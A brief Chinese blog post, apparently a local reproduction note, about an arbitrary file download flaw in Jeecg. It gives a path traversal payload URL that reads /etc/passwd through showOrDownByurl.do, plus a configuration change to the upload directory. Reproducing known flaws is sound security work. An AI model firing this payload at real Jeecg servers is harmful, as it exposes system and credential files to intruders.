Jeecg 任意文件下載漏洞

payload:
localhost:8080/jeecg_war/chat/imController/showOrDownByurl.do?dbPath=../../etc/passwd&down=1

它默認的文件路徑是D://upFiles,我們部署在linux下把目錄改爲其他的任意目錄,我這裏修改爲/tmp/uploads

在配置文件中進行修改(/src/main/resources/chat_config.properties)

在這裏插入圖片描述

在這裏插入圖片描述

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章